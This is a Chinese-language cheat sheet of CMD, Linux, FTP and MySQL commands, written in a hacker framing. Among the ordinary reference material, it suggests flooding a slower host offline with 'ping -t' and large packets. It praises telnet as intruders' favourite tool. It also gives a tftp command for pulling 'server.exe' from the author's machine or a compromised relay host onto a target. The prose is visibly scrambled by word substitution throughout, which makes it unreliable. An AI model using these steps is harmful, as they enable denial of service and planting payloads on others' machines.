CMD经常使用的命令

Win7Excuting订单

win+R。运行该快捷方式。下面3一个人必须知道：

ping 它是用来检查网络是否通畅或者网络连接速度的命令。

作为一个生活在网络上的管理员或者黑客来说，ping命令是第一个必须掌握的DOS命令，它所利用的原理是这种：网络上的机器都有唯一确定的IP地址，我们给目标IP地址发送一个数据包。对方就要返回一个相同大小的数据包。依据返回的数据包我们能够确定目标主机的存在，能够初步推断目标主机的操作系统等。

以下就来看看它的一些经常使用的操作。先看看帮助吧，在DOS窗体中键入：ping /? 回车。。所看到的的帮助画面。在此，我们仅仅掌握一些主要的非常实用的參数就能够了（下同）。 　　　　-t 表示将不间断向目标IP发送数据包。直到我们强迫其停止。试想，假设你使用100M的宽带接入，而目标IP是56K的小猫，那么要不了多久。目标IP就由于承受不了这么多的数据而掉线，呵呵，一次攻击就这么简单的实现了。 　　　　-l 定义发送数据包的大小，默觉得32字节，我们利用它能够最大定义到65500字节。结合上面介绍的-t參数一起使用，会有更好的效果哦。 　　　　-n 定义向目标IP发送数据包的次数。默觉得3次。假设网络速度比較慢，3次对我们来说也浪费了不少时间。由于如今我们的目的不过推断目标IP是否存在，那么就定义为一次吧。

　　　　说明一下，假设-t 參数和 -n參数一起使用。ping命令就以放在后面的參数为标准。比方"ping IP -t -n 3"，尽管使用了-t參数。但并非一直ping下去，而是仅仅ping 3次。另外，ping命令不一定非得ping IP，也能够直接ping主机域名，这样就能够得到主机的IP。 　　　　以下我们举个样例来说明一下详细使用方法。

　　　　这里time=2表示从发出数据包到接受到返回数据包所用的时间是2秒。从这里能够推断网络连接速度的大小 。从TTL的返回值能够初步推断被ping主机的操作系统，之所以说"初步推断"是由于这个值是能够改动的。

这里TTL=32表示操作系统可能是win98。　　（小知识：假设TTL=128，则表示目标主机可能是Win2000；假设TTL=250，则目标主机可能是Unix）　　至于利用ping命令能够高速查找局域网故障，能够高速搜索最快的QQserver。能够对别人进行ping攻击……这些就靠大家自己发挥了。

　


ftp 大家对这个命令应该比較熟悉了吧？网络上开放的ftp的主机非常多，当中非常大一部分是匿名的。也就是说不论什么人都能够登陆上去。如今假设你扫到了一台开放ftp服务的主机（一般都是开了21port的机器），假设你还不会使用ftp的命令怎么办？以下就给出主要的ftp命令用法。

　　首先在命令行键入ftp回车，出现ftp的提示符，这时候能够键入"help"来查看帮助（不论什么DOS命令都能够使用此方法查看其帮助)。 　　　　大家可能看到了，这么多命令该怎么用？事实上也用不到那么多，掌握几个主要的就够了。 　　　　首先是登陆过程。这就要用到open了。直接在ftp的提示符下输入"open 主机IP ftpport"回车就可以，一般port默认都是21，能够不写。

接着就是输入合法的username和password进行登陆了，这里以匿名ftp为例介绍。 　　　　username和password都是ftp，password是不显示的。当提示**** logged in时，就说明登陆成功。这里由于是匿名登陆，所以用户显示为Anonymous。

　　　　接下来就要介绍详细命令的用法了。 　　　　dir 跟DOS命令一样，用于查看server的文件，直接敲上dir回车。就能够看到此ftpserver上的文件。　　cd 进入某个目录。

　　get 下载文件到本地机器。

　　put 上传文件到远程server。这就要看远程ftpserver是否给了你可写的权限了，假设能够，呵呵，该怎么 利用就不多说了，大家就自由发挥去吧。　　delete 删除远程ftpserver上的文件。这也必须保证你有可写的权限。　　bye 退出当前连接。　　quit 同上。 


telnet 功能强大的远程登陆命令。差点儿全部的入侵者都喜欢用它。屡试不爽。为什么？它操作简单。如同使用自己的机器一样。仅仅要你熟悉DOS命令，在成功以administrator身份连接了远程机器后。就能够用它来干你想干的一切了。以下介绍一下用法。首先键入telnet回车，再键入help查看其帮助信息。

　　　　然后在提示符下键入open IP回车，这时就出现了登陆窗体。让你输入合法的username和password，这里输入不论什么password都是不显示的。

　　　　当输入username和password都正确后就成功建立了telnet连接。这时候你就在远程主机上具有了和此用户一样的权限，利用DOS命令就能够实现你想干的事情了。这里我使用的超级管理员权限登陆的。

其它的还有：
shutdown-------60秒倒计时关机命令
notepad--------打开记事本
calc-----------启动计算器
taskmgr-----任务管理器(2000/xp/2003)
write----------写字板
mspaint--------绘图板
mstsc----------远程桌面连接
cmd.exe--------CMD命令提示符
netstat -a 查看开启了哪些port,经常使用netstat -an
netstat -n 查看port的网络连接情况。经常使用netstat -an

ping ip(或域名) 向对方主机发送默认大小为32字节的数据，參数：“-l[空格]数据包大小”。“-n发送数据次数”。“-t”指一直ping。

ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址。ipconfig可用參数“/all”显示所有配置信息
telnet ip port 远和登陆server,默认port为23
open ip 连接到IP（属telnet登陆后的命令）
telnet 在本机上直接键入telnet 将进入本机的telnet
copy 路径文件名称1　路径文件名称2 /y 拷贝文件1到指定的文件夹为文件2，用參数/y就同一时候取消确认你要改写一份现存文件夹文件
xcopy 要复制的文件或文件夹树　目标地址文件夹名 拷贝文件和文件夹树。用參数/Y将不提示覆盖同样文件
　　    用參数/e才可连文件夹下的子文件夹一起拷贝到目标地址下。
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:server.exe 登陆后，将“IP”的server.exe下载到目标主机c:server.exe 參数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以            ASCII模式（传送文本文件模式）进行传送
tftp -i 对方IP　put c:server.exe 登陆后，上传本地c:server.exe至主机
ftp ip port 用于上传文件至server或进行文件操作。默认port为21。

bin指用二进制方式传送（可运行文件进）。默觉得ASCII格式传送(文本文件时)
dir 查看文件，參数：/Q显示文件及文件夹属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被訪问时间，/T:W上次被改动时间
date /t 、 time /t 使用此參数即“DATE/T”、“TIME/T”将仅仅显示当前日期和时间，而不必输入新日期和时间
set 指定环境变量名称=要指派给变量的字符 环境变量设置
set 显示当前全部的环境变量
set p(或其他字符) 显示出当前以字符p(或其他字符)开头的全部环境变量
echo 信息 在屏幕上显示出信息
find 文件名称 查找某文件
title 标题名字 更改CMD窗体标题名字
color 颜色值 设置cmd控制台前景和背景颜色；0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白
prompt 名称 更改cmd.exe的显示的命令提示符(把C:、D:统一改为：EntSky )
md　文件夹名 创建文件夹
replace 源文件　要替换文件的文件夹 替换文件
tree 以树形结构显示出文件夹，用參数-f 将列出第个文件夹中文件名
type 文件名称 显示文本文件的内容
more 文件名称 逐屏显示输出文件
taskmgr 调出任务管理器
　　

• 　　win2003系统下新增命令（有用部份）：

shutdown /參数 关闭或重新启动本地或远程主机。
參数说明：/S 关闭主机，/R 重新启动主机， /T 数字 设定延时的时间。范围0～180秒之间， /A取消开机。/M //IP 指定的远程主机。　　例：shutdown /r /t 0 马上重新启动本地主机（无延时）
tasklist 显示当前执行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。
參数说明：/M 列出当前进程载入的dll文件。/SVC 显示出每一个进程相应的服务，无參数时就仅仅列出当前的进程。

• 　　Linux系统下基本命令　注：要区分大写和小写

uname 显示版本号信息（同win2K的 ver）
dir 显示当前文件夹文件,ls -al 显示包含隐藏文件（同win2K的 dir）
pwd 查询当前所在的文件夹位置
cd cd　..回到上一层文件夹。注意cd 与..之间有空格。

cd　/返回到根文件夹。
cat 文件名称 查看文件内容
cat >abc.txt 往abc.txt文件里写上内容。

more 文件名称 以一页一页的方式显示一个文本文件。
cp 拷贝文件
mv 移动文件
rm 文件名称 删除文件，rm -a 文件夹名删除文件夹及子文件夹
mkdir 文件夹名 建立文件夹
rmdir 删除子文件夹。文件夹内没有文档。

chmod 设定档案或文件夹的存取权限
grep 在档案中查找字符串
diff 档案文件比較
find 档案搜寻
date 如今的日期、时间
who 查询眼下和你使用同一台机器的人以及Login时间地点
w 查询眼下上机者的具体资料
whoami 查看自己的帐号名称
groups 查看某人的Group
passwd 更改password
history 查看自己下过的命令
ps 显示进程状态
kill 停止某进程
gcc 黑客通经常使用它来编译C语言写的文件
su 权限转换为指定使用者
telnet IP telnet连接对方主机（同win2K），当出现bash$时就说明连接成功。

ftp ftp连接上某server（同win2K）

• FTP命令

无论是在linux系统中还是在window系统中，FTP命令都是非常重要的。

以下我具体的整理了一份FTP命令，前16个最为经常使用。
　　FTP的命令行格式为：
　　ftp -v -d -i -n -g [主机名] ，当中
　　-v 显示远程server的全部响应信息
　　-n 限制ftp的自己主动登录。即不使用。.n etrc文件；
　　-d 使用调试方式；
　　-g 取消全局文件名称。

• FTP使用的内部命令例如以下(中括号表示可选项):

最为经常使用的有例如以下：　　　
01.cd remote-dir：进入远程主机文件夹。
02.cdup：进入远程主机文件夹的父文件夹。
03.pwd：显示远程主机的当前工作文件夹。
04.lcd[dir]：将本地工作文件夹切换至dir。
05.dir[remote-dir][local-file]：显示远程主机文件夹。并将结果存入本地文件。

06.ls[remote-dir][local-file]：显示远程文件夹remote-dir， 并存入本地文件local-file。

07.delete remote-file：删除远程主机文件。

08.get remote-file[local-file](下载)：将远程主机的文件remote-file传至本地硬盘的local-file。
09.put local-file[remote-file](上传)：将本地文件local-file传送至远程主机。
10.mget remote-files：传输多个远程文件。
11.mput local-file：将多个文件传输至远程主机。

12.prompt：设置多个文件传输时的交互提示。

13.bin：使用二进制文件传输方式。
14.close：中断与远程server的ftp会话(与open相应)。
15.quit：同bye。退出ftp会话。

• 其它的还包含：

![cmd[args]]：在本地机中运行交互shell。exit回到ftp环境，如：!ls*.zip
.$ macro-ame[args]： 运行宏定义macro-name。
account[password]： 提供登录远程系统成功后訪问系统资源所需的补充口令。
append local-file[remote-file]：将本地文件追加到远程系统主机，若未指定远程系统文件名称，则使用本地文件名称。
ascii：使用ascii类型传输方式。
bell：每一个命令运行完成后计算机响铃一次。
case：在使用mget时。将远程主机文件名称中的大写转为小写字母。
chmod mode file-name：将远程主机文件file-name的存取方式设置为mode，如：chmod 777 a.out。
cr：使用asscii方式传输文件时，将回车换行转换为回行。
debug[debug-value]：设置调试方式， 显示发送至远程主机的每条命令，如：deb up 3，若设为0，表示取消debug。

disconnection：同close。

form format：将文件传输方式设置为format，缺省为file方式。
glob：设置mdelete，mget，mput的文件名称扩展。缺省时不扩展文件名称。同命令行的-g參数。
hash：每传输1024字节，显示一个hash符号(#)。
help[cmd]：显示ftp内部命令cmd的帮助信息。如：help get。
idle[seconds]：将远程server的休眠计时器设为[seconds]秒。

image：设置二进制传输方式(同binary)。
macdef macro-name：定义一个宏，遇到macdef下的空行时，宏定义结束。

mdelete[remote-file]：删除远程主机文件。
mdir remote-files local-file：与dir类似，但可指定多个远程文件，如 ：mdir *.o.*.zipoutfile 。
mkdir dir-name：在远程主机中建一文件夹。
mls remote-file local-file：同nlist，但可指定多个文件名称。
mode[modename]：将文件传输方式设置为modename， 缺省为stream方式。

modtime file-name：显示远程主机文件的最后改动时间。

newer file-name： 假设远程机中file-name的改动时间比本地硬盘同名文件的时间更近，则重传该文件。
nlist[remote-dir][local-file]：显示远程主机文件夹的文件清单，并存入本地硬盘的local-file。

nmap[inpattern outpattern]：设置文件名称映射机制， 使得文件传输时，文件里的某些字符相互转换。 如：nmap $1.$2.$3[$1。$2].[$2，$3]，则传输文件a1.a2.a3时，文件名称变为a1。a2。 该命令特别适用于远程主机为非UNIX机的情况。
ntrans[inchars[outchars]]：设置文件名称字符的翻译机制，如ntrans1R，则文件名称LLL将变为RRR。
open host[port]：建立指定ftpserver连接。可指定连接端口。
passive：进入被动传输方式。
proxy ftp-cmd：在次要控制连接中，运行一条ftp命令， 该命令同意连接两个ftpserver，以在两个server间传输文件。

第一条ftp命令必须为open。以首先建立两个server间的连接。

quote arg1，arg2...：将參数逐字发至远程ftpserver，如：quote syst.
recv remote-file[local-file]：同get。
reget remote-file[local-file]：类似于get， 但若local-file存在，则从上次传输中断处续传。
rhelp[cmd-name]：请求获得远程主机的帮助。
rstatus[file-name]：若未指定文件名称，则显示远程主机的状态， 否则显示文件状态。
rename[from][to]：更改远程主机文件名称。
reset：清除回答队列。

restart marker：从指定的标志marker处。又一次開始get或put，如：restart 130。

rmdir dir-name：删除远程主机文件夹。
runique：设置文件名称仅仅一性存储，若文件存在，则在原文件后加后缀.1， .2等。
send local-file[remote-file]：同put。
sendport：设置PORT命令的使用。

site arg1，arg2...：将參数作为SITE命令逐字发送至远程ftp主机。

size file-name：显示远程主机文件大小，如：site idle 7200。

status：显示当前ftp状态。
struct[struct-name]：将文件传输结构设置为struct-name， 缺省时使用stream结构。

sunique：将远程主机文件名称存储设置为仅仅一(与runique相应)。

system：显示远程主机的操作系统类型。
tenex：将文件传输类型设置为TENEX机的所需的类型。
tick：设置传输时的字节计数器。
trace：设置包跟踪。
type[type-name]：设置文件传输类型为type-name，缺省为ascii。如:type binary，设置二进制传输方式。

umask[newmask]：将远程server的缺省umask设置为newmask。如：umask 3
user user-name[password][account]：向远程主机表明自己的身份。须要口令时，必须输入口令。如：user anonymous my@email。
verbose：同命令行的-v參数，即设置详尽报告方式。ftp server的全部响 应都将显示给用户。缺省为on.

• MYSQL命令

首先要想使用mysql的命令。必须将mysql的bin文件夹加入到path变量里面去。我个人比較喜欢使用wamp这套集成mysql的集成工具。这个工具非常方便非常好使用的，并且也自带着命令窗体的。我加入C:wampinmysqlmysql5.6.17in了到path里面去，这样子就能够在CMD窗体里面使用mysql命令了。

 
连接MYSQL有2种方式(假设刚安装好MYSQL。超级用户root是没有password的，普通情况下使用自己电脑里面的mysql。直接敲mysql即可)：
1，mysql -h 主机地址 -u username -p password；(例：mysql -h 127.0.0.1 -u root -p)
2，mysql -p password -u username -h 主机地址。(例：mysql -p -u root -h 127.0.0.1)
(注意:u与root能够不用加空格，其他也一样)
退出MYSQL非常easy：exit 或者 quit
以下这些就是经常使用的sql语句，以后会在整理数据库的时候做具体的介绍，这里不多赘述了。
　　mysqladmin -uusername -p旧password password 新password 改动password
　　show databases; 显示数据库列表。刚開始时才两个数据库：mysql和test。mysql库非常重要它里面有MYSQL的系统信息。我们改password和新增用户，实际上就是用这个库进行操作。
　　use mysql。
　　show tables; 显示库中的数据表
　　describe 表名; 显示数据表的结构
　　create database 库名; 建库
　　use 库名；
　　create table 表名 (现场设置列表)； 建表
　　drop database 库名;
　　drop table 表名。 删除库和删除表
　　delete from 表名; 表中的空的记录
　　select * from 表名; 表中显示的记录